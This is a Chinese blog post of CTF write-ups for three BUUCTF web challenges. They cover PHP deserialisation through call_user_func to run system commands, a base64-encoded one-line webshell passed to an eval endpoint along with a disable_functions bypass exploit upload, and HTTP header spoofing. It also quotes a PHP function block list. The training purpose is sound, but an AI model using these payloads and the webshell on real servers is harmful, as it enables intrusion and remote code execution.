2021-02-03

最新推荐文章于 2022-09-22 18:54:36 发布
最新推荐文章于 2022-09-22 18:54:36 发布
阅读量174 收藏
点赞数
分类专栏: BUUCTF web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53314778/article/details/113617416
版权
web 同时被 2 个专栏收录
52 篇文章 0 订阅
订阅专栏
BUUCTF
46 篇文章 0 订阅
订阅专栏

[网鼎杯 2020 朱雀组]phpweb

考察知识点
call_user_func()回调函数,反序列化

PHP内置函数call_user_func()使用方法
PHP highlight_file() 函数

流程:
在这里插入图片描述
页面看不出啥,抓个包看看。
在这里插入图片描述从包中我们可以看到,传递了两个参数,func和p。func的值是date,再结合p的值,我猜测这里是用了call_user_func()来回调函数,即将func的值当作函数名,p的值当作参数。那么我们直接使用system函数查看当前目录下的文件
在这里插入图片描述
回显Hacker,应该是被waf拦了,用highlight_file()看一下源码

<?php
    $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
    function gettime($func, $p) {
        $result = call_user_func($func, $p);
		$a= gettype($result);
        if ($a == "string") {
            return $result;
        } else {return "";}
    }
    class Test {
        var $p = "Y-m-d h:i:s a";
        var $func = "date";
        function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];

    if ($func != null) {
        $func = strtolower($func);
        if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
        }else {
            die("Hacker...");
        }
    }
?>

果然是使用了call_user_func()函数 ,不过禁用了一部分函数,导致我们没法执行命令。禁用的函数比较全面,所以直接执行命令是不太可行的。然后我看到源码里面有一个Test类,在__destruct()里面会调用gettime(),再看禁用的函数里没有unserialize(),且$ func和$ p是可控的,那么就可以反序列化来达到命令执行的目的。
思路已经明确了,接下来就是构造payload了,反序列化进行绕过利用

<?php
	class Test{
		var $p="ls";
		var $func="system";
	}
	$a=new Test();
	echo serialize($a);
?>

尝试一下
在这里插入图片描述
可以看到命令成功执行了,然后就找一下flag的路径,再看flag就行了
find / -name 'flag*'


<?php
	class Test{
		var $p="find / -name flag*";";
		var $func="system";
	}
	$a=new Test();
	echo serialize($a);
?>

在这里插入图片描述

然后构造查看flag的序列化字符串

<?php
class Test {
        var $p = "cat /tmp/flagoefiu4r93";
        var $func = "system";
    }
$a=new Test();
echo serialize($a);
?>

在这里插入图片描述

[GKCTF2020]CheckIN

打开题目,直接得到源码

<title>Check_In</title>
<?php 
highlight_file(__FILE__);
class ClassName
{
        public $code = null;
        public $decode = null;
        function __construct()
        {
                $this->code = @$this->x()['Ginkgo'];
                $this->decode = @base64_decode( $this->code );
                @Eval($this->decode);
        }

        public function x()
        {
                return $_REQUEST;
        }
}
new ClassName();

源码较为简单,总结一下就是
eval(base64_decode($_REQUEST['Ginkgo']))
存在代码执行漏洞,却发现很多函数被ban了,可能是开启了disable_function,这里先尝试是否能执行phpinfo()
因为存在一个base64_decode函数所以要进行base64编码。
phpinfo(). base64加密之后cGhwaW5mbygpOw==
/?Ginkgo=cGhwaW5mbygpOw==
执行成功,找到查看一下disable_function中被ban的函数
在这里插入图片描述
所以,这里需要绕过disable_function,先传一句话木马连接上shell
一句话木马eval($_POST[‘123’]); 加密之后得ZXZhbCgkX1BPU1RbJ0EnXSk7
/?Ginkgo=ZXZhbCgkX1BPU1RbJ0EnXSk7
在这里插入图片描述
在根目录文件下发现flag文件和readflag文件,猜测执行readflag就能读取到flag,但是权限等问题无法读取和执行
这里就需要使用绕过disable_function的技巧,通过phpinfo得知,该php的版本为7.3,在该版本下,php7-gc-bypass漏洞利用PHP garbage collector程序中的堆溢出触发进而执行命令
影响范围是linux,php7.0-7.3,给出了exp(这个版本有一个漏洞
具体的exp在这里面很详细了)

然后我们将其代码下载下来,放入我们的1.php文件中,记得pwn(’’)里面的东西要改成readflag
在这里插入图片描述
然后通过蚁剑进行上传这里发现tmp目录权限是1777,于是决定上传到这个目录

在这里插入图片描述
点击此处上传在这里插入图片描述
通过之前的一句话来执行文件包含,得到flag在这里插入图片描述

[BJDCTF 2nd]假猪套天下第一

Header:请求头参数详解
在这里插入图片描述

在这里插入图片描述随便登陆一个:
在这里插入图片描述

用admin登陆试试,不行
暂时没有好的思路了,抓个包分析一下:
在这里插入图片描述发现L0g1n.php在这里插入图片描述提示需要99年后,请求头里面有time,修改成一个很大的数字在这里插入图片描述返回信息变成了需要从本地访问,使用XFF或者Client-ip绕过(用户IP地址 )在这里插入图片描述
提示信息变成了需要来自于gem-love.com,添加Referer头在这里插入图片描述现在变成了需要使用Commodo 64浏览器,查一下全称是:Commodore 64

填在user-agent里面

在这里插入图片描述需要我们的邮箱是:root@gem-love.com,添加From

在这里插入图片描述最后代理服务器地址需要是y1ng.vip,添加Via在这里插入图片描述

得到一串base64编码字符,对应解码即可获得flag

无尽星河-深空
关注
专栏目录
2021-02-03-sd-export-bundle:标准演示导出捆绑
02-24
在IT行业中,"2021-02-03-sd-export-bundle"看起来像是一个特定项目或软件开发过程中的版本标识,日期格式(2021-02-03)表明这是2021年2月3日创建或更新的。"标准演示导出捆绑"可能是该项目或软件的一个功能模块,...
nodemcu-release-18-modules-2021-06-04-02-03-43-integer.bin
06-04
You successfully commissioned a NodeMCU custom build from the release branch.... We'll keep you posted by email about the progress of your build. In the meantime I suggest you take a look at the build ...
绕过disable_function
qq_51770207的博客
09-22 4132
绕过disable_function
绕过disable_function总结
unexpectedthing的博客
03-27 4824
前言 有些时候,phpinfo()有disable_functions 蚁剑终端命令不起作用,就可能是df的问题 黑名单绕过 就是一些运维人员php命令执行的函数没禁用完 exec,passthru,shell_exec,eval,system,popen,proc_open(),pcntl_exec 前几种都比较简单 popen 打开进程文件指针 <?php $command=$_POST['cmd']; $handle = popen($command,"r"); while(!feof($
如何在ctf解题实战中绕过disable_function
qq_47168481的博客
01-30 7244
本文介绍将介绍ctf比赛中遇到的三种绕过disable_function的方法
phpinfo 命令执行函数被禁用绕过tips
yggcwhat
06-02 1749
phpinfo 命令执行函数被禁用绕过tips
2021-03-02-shiny
02-12
木工车间模板 该存储库是The Carpentries的( , 和的)模板,用于创建研讨会的网站。 请不要直接在GitHub上存储此存储库。 相反,请按照以下使用GitHub的“模板”功能复制此workshop-template存储库并为您的工作坊...
2021-03-02-ams
02-09
木工车间模板 该存储库是The Carpentries的( , 和的)模板,用于创建研讨会的网站。 请不要直接在GitHub上存储此存储库。 相反,请按照以下使用GitHub的“模板”功能复制此workshop-template存储库并为您的工作坊...
实战中绕过disable_functions执行命令
jammny
12-11 2383
前言 前几天看到有大佬提到一种小型贷款网站,这种贷款网站从账号的注册到借款的流程都显得很随便,仿佛巴不得直接无条件借钱给你似的,充满“诈骗”的气息。 任意文件上传 看着充满暗示的提示语,我们仿照受害者的思路点击借款: 随意填写借款金额后,会让我们上传身份证信息: 文件上传的时候,发现前端有检验。随手上传了图片木马,并用bp抓包分析。 值得一提的是,在bp抓取到的数据包下面。可以看到有一段base64图片加密了后的数据,经过测试这段数据并不会被后端所检验和使用,也就说可以直接删掉.
ctfshow-命令执行
weixin_45794666的博客
12-19 4199
命令执行 反引号`` 反引号``即命令替换 是指Shell可以先执行``中的命令,将输出结果暂时保存,在适当的地方输出 单引号,双引号 适用条件:过滤了字符串 放在shell命令中,绕过正则匹配且不影响原意 空格绕过 > < <> 重定向符 %09(需要php环境) ${IFS} $IFS$9 {cat,flag.php} //用逗号实现了空格功能 %20 %09 读文件绕过(cat绕过) 适用条件:过滤了cat 1)more:一页一页的显示档案内容 (2)less:与 mor
disable_functions绕过总结
闵行小鱼塘
05-18 1923
总结下disable_functions绕过的一些方法
PHP绕过disable_function限制
BerL1n
09-24 5069
前言 之前对php中的这个disable_function没什么了解,不过通过国赛决赛中的一道题引起了注意,因为在对基本上所有的shell命令禁用之后必须想办法突破disable_function才行,这里学习几种突破disable_function的方法。 LD_PRELOAD环境变量突破 LD_PRELOAD是Linux系统的下一个有趣的环境变量:“它允许你定义在程序运行前优先加载的动态链接库...
简单讲解如何绕过PHP disable_function
h0ld1rs的博客
11-01 4597
前言 在渗透测试中,有时遇到拿到webshell后无法执行命令的情况,为了成功提权,需要我们绕过disable_function disable_function简介 disable_functions是php.ini中的一个设置选项,可以用来设置PHP环境禁止使用某些函数,通常是网站管理员为了安全起见,用来禁用某些危险的命令执行函数等。(eval并非PHP函数,放在disable_functions中是无法禁用的,若要禁用需要用到PHP的扩展Suhosin。) 绕过方法 1. 寻找未禁用的函数 黑名单
绕过disable_functions限制
kuaindl的博客
02-09 1090
作用:运维人员通过disable_functions函数来禁用一些在PHP中的一些“危险”函数,将其卸载php.in配置文件中。 例如: passthru,exec,system,chroot,chgrp,chown,shell_exec,proc_open,proc_get_status, papen,ini_alter,ini_restore,dl,openlog,readlink,symlink,popepassthru,link等。 其实disable_function函数也就是一种黑名单限制机制
BUUCTF web-[HCTF 2018]WarmUp
m0_53314778的博客
01-14 4152
[HCTF 2018]WarmUp 点进去一个滑稽,,查看源码 有个php,访问php 查看源码,有个hint.php访问一下 提示说flag在ffffllllaaaagggg文件里,我们继续分析源码 我们发现最底部的if语句为执行条件,有三个条件,第一个判断文件不能为空(检查是否传了file参数),第二这个传的参数是字符串,第三要过白名单检测,过了之后包含 隐藏了flag的文件。我们再看上面的if语句,白名单是hint.php,又有mb_strpos和mb_substr截取内容,碰到?就截止,所以我们只
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值